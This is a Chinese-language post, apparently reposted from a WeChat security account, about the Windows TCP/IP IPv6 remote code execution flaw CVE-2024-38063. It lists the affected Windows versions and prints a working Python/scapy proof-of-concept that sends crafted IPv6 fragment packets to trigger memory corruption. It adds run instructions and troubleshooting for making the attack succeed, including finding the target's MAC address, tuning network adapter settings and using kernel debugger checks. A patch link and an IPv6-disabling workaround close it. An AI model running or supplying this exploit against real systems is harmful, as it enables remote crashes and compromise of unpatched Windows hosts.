影响版本:
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
验证脚本
from scapy.all import *
iface=''
ip_addr=''
mac_addr=''
num_tries=20
num_batches=20
def get_packets_with_mac(i):
frag_id = 0xdebac1e + i
first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
return [first, second, third]
def get_packets(i):
if mac_addr != '':
return get_packets_with_mac(i)
frag_id = 0xdebac1e + i
first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
return [first, second, third]
final_ps = []
for _ in range(num_batches):
for i in range(num_tries):
final_ps += get_packets(i) + get_packets(i)
print("Sending packets")
if mac_addr != '':
sendp(final_ps, iface)
else:
send(final_ps, iface)
for i in range(60):
print(f"Memory corruption will be triggered in {60-i} seconds", end='r')
time.sleep(1)
print("")
利用方法(需要添加ip配置)
pip3 install scapy
python3 cve-2024-38063.py
不能运行故障排除
如果不起作用,可能是因为:
-
无法通过 IPv6 访问目标系统:
-
禁用Windows防火墙
-
从主机 ping -6 {ipv6_address}
-
确保你收到回复
-
重新启用防火墙
-
目标系统未接收数据包
-
在目标系统上安装 wireshark,并检查脚本发送的数据包是否到达
-
scapy 报告“未找到到达目的地的 Mac 地址。使用广播。”
-
你需要找到目标机器的mac地址
-
这可以通过运行上面的 ping 命令并检查 wireshark 中的答复(eth 源地址字段)来完成
-
您也可以使用 scapy:
Ether(raw(sr1(IPv6(dst={your_dest_ip})/ICMPv6EchoRequest()))).src
,但有时这不起作用 -
获得 mac 地址后,将其放入脚本中的 mac_addr 字段并运行脚本
-
目标系统上未合并数据包
-
根据您的适配器网络适配器/驱动程序,可能很难让 Windows 合并数据包,而无需采取类似 ddos 之类的手段来淹没目标。
-
您可以尝试修改适配器设置,例如“数据包合并”、“中断调节”、“中断调节模式”、“接收段合并”,具体取决于哪些可用。例如,在我的专用服务器上将“中断调节模式”设置为“极端”可使漏洞重现。
-
如果其他方法都失败了,您可以附加内核调试器并检查以下几点:
-
tcpip!Ipv6pReceiveDestinationOptions
->tcpip!Ipv6pProcessOptions
->被击中了吗tcpip!IppSendErrorList
? -
中断
tcpip!Ipv6pProcessOptions
并检查是否[rcx]
始终为零。如果是,则由于某种原因数据包未合并。 -
中断
tcpip!Ipv6pReceiveFragment
并检查是否[rcx+0x30]
等于零。如果不等于零,则表示漏洞由于某种原因未能触发。
官方修复方案:
厂商已发布补丁,具体链接为:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
临时修复方案:
根据微软官方的建议,禁用服务器上的 IPv6 可临时修复该漏洞。但需要注意的是,禁用 IPv6 可能会导致某些意外的问题,请根据自身业务,酌情进行处置。
原文始发于微信公众号(信安王子):Windows TCP/IP IPv6 RCE POC(CVE-2024-38063)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论